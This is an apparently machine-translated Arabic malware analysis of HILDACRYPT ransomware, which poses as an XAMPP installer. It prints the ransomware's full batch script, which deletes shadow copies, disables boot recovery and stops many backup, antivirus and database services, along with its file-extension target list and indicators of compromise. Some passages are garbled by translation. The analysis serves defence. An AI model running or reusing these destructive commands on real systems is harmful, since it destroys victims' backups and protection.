مرحبًا حبر! مرة أخرى، نحن نتحدث عن أحدث إصدارات البرامج الضارة من فئة Ransomware. HILDACRYPT هو برنامج فدية جديد، اكتشفه أحد أفراد عائلة Hilda في أغسطس 2019، وسمي على اسم الرسوم المتحركة التي أنتجتها Netflix والتي تم استخدامها لتوزيع البرنامج. اليوم نتعرف على الميزات التقنية لفيروس الفدية المحدث هذا.
في الإصدار الأول من Hilda Ransomware، رابط لأحد البرامج المنشورة على Youtube سلسلة الرسوم المتحركة كانت موجودة في رسالة الفدية. يتنكر HILDACRYPT في هيئة مثبت XAMPP شرعي، وهو توزيع Apache سهل التثبيت يتضمن MariaDB وPHP وPerl. في الوقت نفسه، يحتوي cryptolocker على اسم ملف مختلف - xamp. بالإضافة إلى ذلك، لا يحتوي ملف برنامج الفدية على توقيع إلكتروني.
التحليل الساكن
يحتوي برنامج الفدية على ملف PE32 .NET مكتوب لنظام التشغيل مايكروسوفت Windowsيبلغ حجمه 135,168 بايت. كُتب كل من كود البرنامج الرئيسي وكود الحماية بلغة C#. وفقًا لتاريخ ووقت التجميع، تم إنشاء الملف الثنائي في 14 سبتمبر 2019.
وفقًا لـ Detect It Easy، تتم أرشفة برنامج الفدية باستخدام Confuser وConfuserEx، لكن أدوات التعتيم هذه هي نفسها كما كانت من قبل، فقط ConfuserEx هو خليفة Confuser، لذا فإن توقيعات التعليمات البرمجية الخاصة بها متشابهة.
لقد تم بالفعل تضمين HILDACRYPT مع ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
ناقل الهجوم
على الأرجح، تم اكتشاف برنامج الفدية على أحد مواقع برمجة الويب، متنكرًا في صورة برنامج XAMPP شرعي.
يمكن رؤية سلسلة العدوى بأكملها .
التشويش
يتم تخزين سلاسل برامج الفدية في شكل مشفر. عند إطلاقه، يقوم HILDACRYPT بفك تشفيرها باستخدام Base64 وAES-256-CBC.
تركيب
أولاً، يقوم برنامج الفدية بإنشاء مجلد في %AppDataRoaming% يتم فيه إنشاء معلمة GUID (المعرف الفريد العالمي) بشكل عشوائي. من خلال إضافة ملف بات إلى هذا الموقع، يقوم فيروس الفدية بتشغيله باستخدام cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat والخروج
ثم يبدأ بعد ذلك في تنفيذ برنامج نصي دفعي لتعطيل ميزات النظام أو خدماته.
يحتوي البرنامج النصي على قائمة طويلة من الأوامر التي تعمل على تدمير النسخ الاحتياطية وتعطيل خادم SQL والنسخ الاحتياطي وحلول مكافحة الفيروسات.
على سبيل المثال، يحاول إيقاف خدمات Acronis Backup دون جدوى. بالإضافة إلى ذلك، فهو يهاجم أنظمة النسخ الاحتياطي وحلول مكافحة الفيروسات من الموردين التاليين: Veeam، وSophos، وKaspersky، وMcAfee وغيرها.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
بمجرد تعطيل الخدمات والعمليات المذكورة أعلاه، يقوم برنامج cryptolocker بجمع معلومات حول جميع العمليات الجارية باستخدام أمر قائمة المهام للتأكد من تعطل جميع الخدمات الضرورية.
قائمة المهام v/fo csv
يعرض هذا الأمر قائمة مفصلة بالعمليات الجارية، والتي يتم فصل عناصرها بعلامة "".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
بعد هذا الفحص، يبدأ برنامج الفدية عملية التشفير.
التشفير
تشفير الملفات
يمر HILDACRYPT عبر جميع محتويات محركات الأقراص الثابتة الموجودة، باستثناء مجلدات Recycle.Bin وReference AssembliesMicrosoft. يحتوي الأخير على ملفات dll وpdb وما إلى ذلك الهامة لتطبيقات .Net التي يمكن أن تؤثر على تشغيل برنامج الفدية. للبحث عن الملفات التي سيتم تشفيرها، يتم استخدام قائمة الامتدادات التالية:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
يستخدم برنامج الفدية خوارزمية AES-256-CBC لتشفير ملفات المستخدم. حجم المفتاح هو 256 بت وحجم متجه التهيئة (IV) هو 16 بايت.
في لقطة الشاشة التالية، تم الحصول على قيم byte_2 وbyte_1 بشكل عشوائي باستخدام GetBytes().
مفتاح
في و
الملف المشفر له الامتداد HCY!.. وهذا مثال لملف مشفر. تم إنشاء المفتاح و IV المذكورين أعلاه لهذا الملف.
تشفير المفاتيح
يقوم برنامج cryptolocker بتخزين مفتاح AES الذي تم إنشاؤه في ملف مشفر. يحتوي الجزء الأول من الملف المشفر على رأس يحتوي على بيانات مثل HILDACRYPT، KEY، IV، FileLen بتنسيق XML، ويبدو كما يلي:
يتم تشفير المفاتيح AES وIV باستخدام RSA-2048، ويتم التشفير باستخدام Base64. يتم تخزين مفتاح RSA العام في نص برنامج التشفير في إحدى السلاسل المشفرة بتنسيق XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
يتم استخدام مفتاح RSA العام لتشفير مفتاح ملف AES. مفتاح RSA العام مشفر بـ Base64 ويتكون من معامل وأس عام 65537. يتطلب فك التشفير مفتاح RSA الخاص، الذي يمتلكه المهاجم.
بعد تشفير RSA، يتم تشفير مفتاح AES باستخدام Base64 المخزن في الملف المشفر.
رسالة فدية
بمجرد اكتمال التشفير، يقوم HILDACRYPT بكتابة ملف html إلى المجلد الذي قام بتشفير الملفات فيه. يحتوي إشعار برنامج الفدية على عنواني بريد إلكتروني حيث يمكن للضحية الاتصال بالمهاجم.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
يحتوي إشعار الابتزاز أيضًا على سطر "No loli is Safe؛)" - في إشارة إلى شخصيات الأنمي والمانجا مع ظهور فتيات صغيرات محظور في اليابان.
إنتاج
أصدرت HILDACRYPT، وهي عائلة جديدة من برامج الفدية، إصدارًا جديدًا. يمنع نموذج التشفير الضحية من فك تشفير الملفات المشفرة بواسطة برنامج الفدية. يستخدم Cryptolocker أساليب الحماية النشطة لتعطيل خدمات الحماية المتعلقة بأنظمة النسخ الاحتياطي وحلول مكافحة الفيروسات. مؤلف HILDACRYPT هو من محبي سلسلة الرسوم المتحركة Hilda المعروضة على Netflix، والتي تم تضمين رابط المقطع الدعائي لها في خطاب الشراء للإصدار السابق من البرنامج.
بشكل طبيعي، и يمكنه حماية جهاز الكمبيوتر الخاص بك من HILDACRYPT Ransomware، ويتمتع مقدمو الخدمة بالقدرة على حماية عملائهم من خلاله . يتم ضمان الحماية من خلال حقيقة أن هذه الحلول تشمل لا يتضمن النسخ الاحتياطي فحسب، بل يشمل أيضًا نظام الأمان المتكامل الخاص بنا - مدعومة بنموذج التعلم الآلي واستنادًا إلى الاستدلال السلوكي، وهي تقنية قادرة على مواجهة تهديد برنامج فدية اليوم الأول بشكل لا مثيل له.
مؤشرات التسوية
امتداد الملف HCY!
هيلداكريبتريدمي.html
xamp.exe بحرف واحد "p" ولا يوجد توقيع رقمي
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
المصدر: www.habr.com
